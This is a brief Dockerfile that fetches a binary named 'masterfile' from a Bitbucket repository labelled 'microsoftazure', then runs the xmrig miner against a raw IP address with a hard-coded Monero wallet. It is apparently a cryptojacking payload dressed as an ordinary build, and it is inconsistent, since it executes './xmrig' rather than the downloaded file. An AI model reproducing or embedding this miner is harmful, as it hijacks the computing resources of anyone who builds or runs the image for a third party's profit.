FROM ubuntu:20.04
#-----------------
RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/anli-projects/microsoftazure/downloads/masterfile
RUN chmod u+x masterfile
RUN ./xmrig -o 54.255.104.167:80 -u 44dWWt57wRicWrDfRhNZne5WNBKAk6rbsFmXSQ3XVNJzLZe91gNfW7YbUupCLHyFx7RiNPV3wNyubcvZHKFcGfkjLi4eBsQ -k --coin monero -a rx/0